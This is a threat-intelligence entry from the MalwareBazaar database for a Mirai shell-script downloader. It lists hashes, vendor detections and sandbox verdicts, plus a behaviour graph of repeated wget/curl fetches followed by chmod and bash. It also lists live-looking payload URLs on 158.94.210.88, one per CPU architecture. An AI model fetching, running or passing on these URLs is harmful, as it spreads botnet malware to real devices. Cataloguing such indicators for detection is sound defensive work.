MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 c37b76b9762846aa610a10483057bf4e6c6cdad1277a62045bbbdb8ee98595f1. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 9


Intelligence 9 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: c37b76b9762846aa610a10483057bf4e6c6cdad1277a62045bbbdb8ee98595f1
SHA3-384 hash: f5bb648f9d3e4012196916bf8cfc2d262d60716d74a938c2871774b17ce0a4b36833f2223bd5abbd61a503a62519c69b
SHA1 hash: 39a8d69e14f8b9b818dc8b2393c12a3e2ee8e2c9
MD5 hash: 48fc8afa23e4010e6c8f59ddd0ef4e08
humanhash: sierra-orange-december-rugby
File name:yarn
Download: download sample
Signature Mirai
Create hunting rule
File size:4'816 bytes
First seen:2025-11-24 17:59:19 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 48:vUhMV4klUq1V4RUrHrWV4cUNoV4aUEpEEV4EeUJkV4+Uq1V4RUOZV49UzSV4sUDG:vb7pWPPLDzOEpebNZabEDfjl10DADdRv
TLSH T1E3A10AE674B4A77A6DB0ED7371D6C642B14061AAE0DA8C0BF3D1F0E8054EF61F484B82
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x8606f6c2e48fe50cc39e412f309f22053e06db1aae20c68452dbc0c813bacfaa97 Miraielf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mipsabb44bb778d3eb33722c8ff7858138a4353d8f46c73995602d2d84715e295b18 Miraielf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl9e715465d9cc0b6987d27bc3bdc7abe122bca168ff708d2ec0c2441263ad70fe Miraielf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm2de20b3347d90622f88ecd1675c009ab4b3a00eb12b454f72bc30d8f37511c26 Miraielf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm52e1e849fc65cd435d469dcfea490d2481eff33e553e0960cd9e0456ae50c0bf9 Miraielf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm619f25bc863a4691eae2074524c2f6624e9a735920f19d0adb745870addce4aa0 Miraielf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7da87a874b834cfb9fc525ce39cd6c8ac65e118c0f401a9fbe9107bdc9c61dbe2 Miraielf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc961a10b6fcdd3bf9cb2eb496ea4458bac31b6891f1cdce4af92b3aa6dfa9e93f Miraielf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68kf4b928db067a0faa140e8fa79a2338315d998130414088617eaac7cc216872f7 Miraielf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc44ab9070ccf7753d5e0cd3eba8625f2eed3e4f382bcb5789049efd299d84e633 Miraielf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686f9d11add2e36cc30580e4e9ff6886a4235188b9132ce02f127ed02b06b578eee Miraielf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh479e05b52966b9df23bd75d3b953b346c354916469522876a7f1bc653f8146261 Miraielf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc294e36334bce82e0ea0289773fb352aa6ebc5d3572d2d15839846a953c9469c4 Miraielf mirai ua-wget
http://158.94.210.88/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86_64n/an/an/a

Intelligence

File Origin
# of uploads :
1
# of downloads :
34
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
Sanesecurity.Malware.30790.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-29.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-6.UNOFFICIAL
Create hunting rule

Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
medusa mirai
Link:
https://www.filescan.io/uploads/69249cff413b91e13cd619d5/reports/9a711098-e258-4945-9509-9e4f28daaa0a/overview
Verdict:
Malicious
File Type:
unix shell
First seen:
2025-11-24T15:04:00Z UTC
Last seen:
2025-11-25T00:57:00Z UTC
Hits:
~10
Detections:
HEUR:Trojan-Downloader.Shell.Agent.p HEUR:Trojan-Downloader.Shell.Agent.gen HEUR:Trojan-Downloader.Shell.Agent.a
Link:
https://opentip.kaspersky.com/c37b76b9762846aa610a10483057bf4e6c6cdad1277a62045bbbdb8ee98595f1/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/7b3c69dd-5bd1-4d4c-9685-7f23c03732b5
Behavior Graph:
Download SVG
%3 guuid=81759840-1800-0000-eeaa-6401980c0000 pid=3224 /usr/bin/sudo guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228 /tmp/sample.bin guuid=81759840-1800-0000-eeaa-6401980c0000 pid=3224->guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228 execve guuid=68102144-1800-0000-eeaa-64019d0c0000 pid=3229 /usr/bin/wget net send-data guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=68102144-1800-0000-eeaa-64019d0c0000 pid=3229 execve guuid=24a3ef4c-1800-0000-eeaa-6401a50c0000 pid=3237 /usr/bin/curl net send-data write-file guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=24a3ef4c-1800-0000-eeaa-6401a50c0000 pid=3237 execve guuid=0a73425a-1800-0000-eeaa-6401b40c0000 pid=3252 /usr/bin/cat guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=0a73425a-1800-0000-eeaa-6401b40c0000 pid=3252 execve guuid=77929a5a-1800-0000-eeaa-6401b60c0000 pid=3254 /usr/bin/chmod guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=77929a5a-1800-0000-eeaa-6401b60c0000 pid=3254 execve guuid=1489f85a-1800-0000-eeaa-6401b70c0000 pid=3255 /usr/bin/bash guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=1489f85a-1800-0000-eeaa-6401b70c0000 pid=3255 clone guuid=93064f5b-1800-0000-eeaa-6401b80c0000 pid=3256 /usr/bin/wget net send-data guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=93064f5b-1800-0000-eeaa-6401b80c0000 pid=3256 execve guuid=e4a8af61-1800-0000-eeaa-6401ca0c0000 pid=3274 /usr/bin/curl net send-data write-file guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=e4a8af61-1800-0000-eeaa-6401ca0c0000 pid=3274 execve guuid=ad39e468-1800-0000-eeaa-6401d90c0000 pid=3289 /usr/bin/cat guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=ad39e468-1800-0000-eeaa-6401d90c0000 pid=3289 execve guuid=85543669-1800-0000-eeaa-6401db0c0000 pid=3291 /usr/bin/chmod guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=85543669-1800-0000-eeaa-6401db0c0000 pid=3291 execve guuid=1a227269-1800-0000-eeaa-6401dd0c0000 pid=3293 /usr/bin/bash guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=1a227269-1800-0000-eeaa-6401dd0c0000 pid=3293 clone guuid=83299869-1800-0000-eeaa-6401de0c0000 pid=3294 /usr/bin/wget net send-data guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=83299869-1800-0000-eeaa-6401de0c0000 pid=3294 execve guuid=a577f870-1800-0000-eeaa-6401ec0c0000 pid=3308 /usr/bin/curl net send-data write-file guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=a577f870-1800-0000-eeaa-6401ec0c0000 pid=3308 execve guuid=9b438478-1800-0000-eeaa-6401010d0000 pid=3329 /usr/bin/cat guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=9b438478-1800-0000-eeaa-6401010d0000 pid=3329 execve guuid=6e81e278-1800-0000-eeaa-6401030d0000 pid=3331 /usr/bin/chmod guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=6e81e278-1800-0000-eeaa-6401030d0000 pid=3331 execve guuid=25993679-1800-0000-eeaa-6401050d0000 pid=3333 /usr/bin/bash guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=25993679-1800-0000-eeaa-6401050d0000 pid=3333 clone guuid=ee8c6b79-1800-0000-eeaa-6401070d0000 pid=3335 /usr/bin/wget net send-data guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=ee8c6b79-1800-0000-eeaa-6401070d0000 pid=3335 execve guuid=74c76d80-1800-0000-eeaa-64010a0d0000 pid=3338 /usr/bin/curl net send-data write-file guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=74c76d80-1800-0000-eeaa-64010a0d0000 pid=3338 execve guuid=289b538a-1800-0000-eeaa-6401200d0000 pid=3360 /usr/bin/cat guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=289b538a-1800-0000-eeaa-6401200d0000 pid=3360 execve guuid=ec62af8a-1800-0000-eeaa-6401220d0000 pid=3362 /usr/bin/chmod guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=ec62af8a-1800-0000-eeaa-6401220d0000 pid=3362 execve guuid=ea87018b-1800-0000-eeaa-6401240d0000 pid=3364 /usr/bin/bash guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=ea87018b-1800-0000-eeaa-6401240d0000 pid=3364 clone guuid=0f6b2d8b-1800-0000-eeaa-6401250d0000 pid=3365 /usr/bin/wget net send-data guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=0f6b2d8b-1800-0000-eeaa-6401250d0000 pid=3365 execve guuid=0eb08991-1800-0000-eeaa-6401360d0000 pid=3382 /usr/bin/curl net send-data write-file guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=0eb08991-1800-0000-eeaa-6401360d0000 pid=3382 execve guuid=fc9ffe98-1800-0000-eeaa-64014b0d0000 pid=3403 /usr/bin/cat guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=fc9ffe98-1800-0000-eeaa-64014b0d0000 pid=3403 execve guuid=0a1a7d99-1800-0000-eeaa-64014d0d0000 pid=3405 /usr/bin/chmod guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=0a1a7d99-1800-0000-eeaa-64014d0d0000 pid=3405 execve guuid=7068fe99-1800-0000-eeaa-64014f0d0000 pid=3407 /usr/bin/bash guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=7068fe99-1800-0000-eeaa-64014f0d0000 pid=3407 clone guuid=7bc8319a-1800-0000-eeaa-6401500d0000 pid=3408 /usr/bin/wget net send-data guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=7bc8319a-1800-0000-eeaa-6401500d0000 pid=3408 execve guuid=4c2da9a1-1800-0000-eeaa-6401620d0000 pid=3426 /usr/bin/curl net send-data write-file guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=4c2da9a1-1800-0000-eeaa-6401620d0000 pid=3426 execve guuid=a39811ac-1800-0000-eeaa-6401790d0000 pid=3449 /usr/bin/cat guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=a39811ac-1800-0000-eeaa-6401790d0000 pid=3449 execve guuid=e8e3ddac-1800-0000-eeaa-64017c0d0000 pid=3452 /usr/bin/chmod guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=e8e3ddac-1800-0000-eeaa-64017c0d0000 pid=3452 execve guuid=98de97ad-1800-0000-eeaa-64017f0d0000 pid=3455 /usr/bin/bash guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=98de97ad-1800-0000-eeaa-64017f0d0000 pid=3455 clone guuid=784decad-1800-0000-eeaa-6401810d0000 pid=3457 /usr/bin/wget net send-data guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=784decad-1800-0000-eeaa-6401810d0000 pid=3457 execve guuid=90787ab4-1800-0000-eeaa-6401910d0000 pid=3473 /usr/bin/curl net send-data write-file guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=90787ab4-1800-0000-eeaa-6401910d0000 pid=3473 execve guuid=b46190bc-1800-0000-eeaa-6401a30d0000 pid=3491 /usr/bin/cat guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=b46190bc-1800-0000-eeaa-6401a30d0000 pid=3491 execve guuid=5e5befbc-1800-0000-eeaa-6401a50d0000 pid=3493 /usr/bin/chmod guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=5e5befbc-1800-0000-eeaa-6401a50d0000 pid=3493 execve guuid=b75a61bd-1800-0000-eeaa-6401a70d0000 pid=3495 /usr/bin/bash guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=b75a61bd-1800-0000-eeaa-6401a70d0000 pid=3495 clone guuid=aa4195bd-1800-0000-eeaa-6401a80d0000 pid=3496 /usr/bin/wget net send-data guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=aa4195bd-1800-0000-eeaa-6401a80d0000 pid=3496 execve guuid=77607ec4-1800-0000-eeaa-6401b80d0000 pid=3512 /usr/bin/curl net send-data write-file guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=77607ec4-1800-0000-eeaa-6401b80d0000 pid=3512 execve guuid=f54222cc-1800-0000-eeaa-6401c10d0000 pid=3521 /usr/bin/cat guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=f54222cc-1800-0000-eeaa-6401c10d0000 pid=3521 execve guuid=6f5373cc-1800-0000-eeaa-6401c20d0000 pid=3522 /usr/bin/chmod guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=6f5373cc-1800-0000-eeaa-6401c20d0000 pid=3522 execve guuid=733fcfcc-1800-0000-eeaa-6401c30d0000 pid=3523 /usr/bin/bash guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=733fcfcc-1800-0000-eeaa-6401c30d0000 pid=3523 clone guuid=31eaf6cc-1800-0000-eeaa-6401c40d0000 pid=3524 /usr/bin/wget net send-data guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=31eaf6cc-1800-0000-eeaa-6401c40d0000 pid=3524 execve guuid=d5cf8bd3-1800-0000-eeaa-6401d30d0000 pid=3539 /usr/bin/curl net send-data write-file guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=d5cf8bd3-1800-0000-eeaa-6401d30d0000 pid=3539 execve guuid=bc1e4adb-1800-0000-eeaa-6401e40d0000 pid=3556 /usr/bin/cat guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=bc1e4adb-1800-0000-eeaa-6401e40d0000 pid=3556 execve guuid=976b9edb-1800-0000-eeaa-6401e60d0000 pid=3558 /usr/bin/chmod guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=976b9edb-1800-0000-eeaa-6401e60d0000 pid=3558 execve guuid=bcadf7db-1800-0000-eeaa-6401e70d0000 pid=3559 /usr/bin/bash guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=bcadf7db-1800-0000-eeaa-6401e70d0000 pid=3559 clone guuid=65e222dc-1800-0000-eeaa-6401e80d0000 pid=3560 /usr/bin/wget net send-data guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=65e222dc-1800-0000-eeaa-6401e80d0000 pid=3560 execve guuid=9050e1e3-1800-0000-eeaa-6401ee0d0000 pid=3566 /usr/bin/curl net send-data write-file guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=9050e1e3-1800-0000-eeaa-6401ee0d0000 pid=3566 execve guuid=7ccdceeb-1800-0000-eeaa-6401f00d0000 pid=3568 /usr/bin/cat guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=7ccdceeb-1800-0000-eeaa-6401f00d0000 pid=3568 execve guuid=27742818-1900-0000-eeaa-6401fc0d0000 pid=3580 /usr/bin/chmod guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=27742818-1900-0000-eeaa-6401fc0d0000 pid=3580 execve guuid=9a918218-1900-0000-eeaa-6401fd0d0000 pid=3581 /usr/bin/bash guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=9a918218-1900-0000-eeaa-6401fd0d0000 pid=3581 clone guuid=8ecbaa18-1900-0000-eeaa-6401ff0d0000 pid=3583 /usr/bin/wget net send-data guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=8ecbaa18-1900-0000-eeaa-6401ff0d0000 pid=3583 execve guuid=f92af61f-1900-0000-eeaa-64011a0e0000 pid=3610 /usr/bin/curl net send-data write-file guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=f92af61f-1900-0000-eeaa-64011a0e0000 pid=3610 execve guuid=5f0a3f27-1900-0000-eeaa-64012c0e0000 pid=3628 /usr/bin/cat guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=5f0a3f27-1900-0000-eeaa-64012c0e0000 pid=3628 execve guuid=f4a5d327-1900-0000-eeaa-64012f0e0000 pid=3631 /usr/bin/chmod guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=f4a5d327-1900-0000-eeaa-64012f0e0000 pid=3631 execve guuid=f8874d28-1900-0000-eeaa-6401310e0000 pid=3633 /usr/bin/bash guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=f8874d28-1900-0000-eeaa-6401310e0000 pid=3633 clone guuid=acc78528-1900-0000-eeaa-6401330e0000 pid=3635 /usr/bin/wget net send-data guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=acc78528-1900-0000-eeaa-6401330e0000 pid=3635 execve guuid=294e6d2f-1900-0000-eeaa-6401430e0000 pid=3651 /usr/bin/curl net send-data write-file guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=294e6d2f-1900-0000-eeaa-6401430e0000 pid=3651 execve guuid=4b59c93c-1900-0000-eeaa-6401620e0000 pid=3682 /usr/bin/cat guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=4b59c93c-1900-0000-eeaa-6401620e0000 pid=3682 execve guuid=30fc5e3d-1900-0000-eeaa-6401640e0000 pid=3684 /usr/bin/chmod guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=30fc5e3d-1900-0000-eeaa-6401640e0000 pid=3684 execve guuid=964ef73d-1900-0000-eeaa-6401660e0000 pid=3686 /usr/bin/bash guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=964ef73d-1900-0000-eeaa-6401660e0000 pid=3686 clone guuid=ccc8473e-1900-0000-eeaa-6401680e0000 pid=3688 /usr/bin/wget net send-data guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=ccc8473e-1900-0000-eeaa-6401680e0000 pid=3688 execve guuid=857b5c45-1900-0000-eeaa-6401780e0000 pid=3704 /usr/bin/curl net send-data write-file guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=857b5c45-1900-0000-eeaa-6401780e0000 pid=3704 execve guuid=47b1ae4e-1900-0000-eeaa-6401880e0000 pid=3720 /usr/bin/cat guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=47b1ae4e-1900-0000-eeaa-6401880e0000 pid=3720 execve guuid=01f05d54-1900-0000-eeaa-6401920e0000 pid=3730 /usr/bin/chmod guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=01f05d54-1900-0000-eeaa-6401920e0000 pid=3730 execve guuid=1150b954-1900-0000-eeaa-6401930e0000 pid=3731 /usr/bin/bash guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=1150b954-1900-0000-eeaa-6401930e0000 pid=3731 clone guuid=527ee854-1900-0000-eeaa-6401940e0000 pid=3732 /usr/bin/wget net send-data guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=527ee854-1900-0000-eeaa-6401940e0000 pid=3732 execve guuid=ce08a85c-1900-0000-eeaa-64019b0e0000 pid=3739 /usr/bin/curl net send-data write-file guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=ce08a85c-1900-0000-eeaa-64019b0e0000 pid=3739 execve guuid=c9f5ba66-1900-0000-eeaa-6401b60e0000 pid=3766 /usr/bin/cat guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=c9f5ba66-1900-0000-eeaa-6401b60e0000 pid=3766 execve guuid=49d23967-1900-0000-eeaa-6401b70e0000 pid=3767 /usr/bin/chmod guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=49d23967-1900-0000-eeaa-6401b70e0000 pid=3767 execve guuid=75ab9867-1900-0000-eeaa-6401bb0e0000 pid=3771 /usr/bin/bash guuid=9dd18e43-1800-0000-eeaa-64019c0c0000 pid=3228->guuid=75ab9867-1900-0000-eeaa-6401bb0e0000 pid=3771 clone 28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 158.94.210.88:80 guuid=68102144-1800-0000-eeaa-64019d0c0000 pid=3229->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 197B guuid=24a3ef4c-1800-0000-eeaa-6401a50c0000 pid=3237->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 146B guuid=93064f5b-1800-0000-eeaa-6401b80c0000 pid=3256->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 198B guuid=e4a8af61-1800-0000-eeaa-6401ca0c0000 pid=3274->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 147B guuid=83299869-1800-0000-eeaa-6401de0c0000 pid=3294->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 198B guuid=a577f870-1800-0000-eeaa-6401ec0c0000 pid=3308->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 147B guuid=ee8c6b79-1800-0000-eeaa-6401070d0000 pid=3335->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 197B guuid=74c76d80-1800-0000-eeaa-64010a0d0000 pid=3338->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 146B guuid=0f6b2d8b-1800-0000-eeaa-6401250d0000 pid=3365->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 198B guuid=0eb08991-1800-0000-eeaa-6401360d0000 pid=3382->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 147B guuid=7bc8319a-1800-0000-eeaa-6401500d0000 pid=3408->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 198B guuid=4c2da9a1-1800-0000-eeaa-6401620d0000 pid=3426->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 147B guuid=784decad-1800-0000-eeaa-6401810d0000 pid=3457->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 198B guuid=90787ab4-1800-0000-eeaa-6401910d0000 pid=3473->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 147B guuid=aa4195bd-1800-0000-eeaa-6401a80d0000 pid=3496->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 197B guuid=77607ec4-1800-0000-eeaa-6401b80d0000 pid=3512->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 146B guuid=31eaf6cc-1800-0000-eeaa-6401c40d0000 pid=3524->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 198B guuid=d5cf8bd3-1800-0000-eeaa-6401d30d0000 pid=3539->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 147B guuid=65e222dc-1800-0000-eeaa-6401e80d0000 pid=3560->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 197B guuid=9050e1e3-1800-0000-eeaa-6401ee0d0000 pid=3566->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 146B guuid=8ecbaa18-1900-0000-eeaa-6401ff0d0000 pid=3583->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 198B guuid=f92af61f-1900-0000-eeaa-64011a0e0000 pid=3610->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 147B guuid=acc78528-1900-0000-eeaa-6401330e0000 pid=3635->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 197B guuid=294e6d2f-1900-0000-eeaa-6401430e0000 pid=3651->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 146B guuid=ccc8473e-1900-0000-eeaa-6401680e0000 pid=3688->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 197B guuid=857b5c45-1900-0000-eeaa-6401780e0000 pid=3704->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 146B guuid=527ee854-1900-0000-eeaa-6401940e0000 pid=3732->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 200B guuid=ce08a85c-1900-0000-eeaa-64019b0e0000 pid=3739->28ee2c59-94a6-5756-a2b6-fa7fcfec6d46 send: 149B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/c37b76b9762846aa610a10483057bf4e6c6cdad1277a62045bbbdb8ee98595f1
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/c37b76b9762846aa610a10483057bf4e6c6cdad1277a62045bbbdb8ee98595f1/
Verdict:
Malicious
Threat:
Family.MIRAI
Link:
https://tip.neiki.dev/file/c37b76b9762846aa610a10483057bf4e6c6cdad1277a62045bbbdb8ee98595f1
Threat name:
Linux.Downloader.Medusa
Create hunting rule
Status:
Malicious
First seen:
2025-11-24 18:00:39 UTC
File Type:
Text (Shell)
AV detection:
23 of 36 (63.89%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=yn5xnolwfbdkuyikcbedav57jzwgzwwre55gebc3xpny52mfsxyq._file
Result
Malware family:
n/a
Score:
  7/10
Tags:
antivm defense_evasion discovery linux
Link:
https://tria.ge/reports/251124-wkylhsam8y/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Checks CPU configuration
File and Directory Permissions Modification
Executes dropped EXE
Malware family:
Mirai
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/c37b76b97628/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/c37b76b9762846aa610a10483057bf4e6c6cdad1277a62045bbbdb8ee98595f1

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Linux_Shellscript_Downloader
Create hunting rule
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh c37b76b9762846aa610a10483057bf4e6c6cdad1277a62045bbbdb8ee98595f1

(this sample)

Mirai

elf 4659da87326851decd5d67b743d9924f09ef8b000c91c63f15ede42a45919120

Mirai

elf 06f6c2e48fe50cc39e412f309f22053e06db1aae20c68452dbc0c813bacfaa97

  
URLhaus
https://urlhaus.abuse.ch/url/3669713/
  
Delivery method
Distributed via web download
  
URLhaus
https://urlhaus.abuse.ch/url/3669707/
  
Dropping
MD5 d890af588619b95e8c751535bc58ac46
  
Dropping
SHA256 06f6c2e48fe50cc39e412f309f22053e06db1aae20c68452dbc0c813bacfaa97

Comments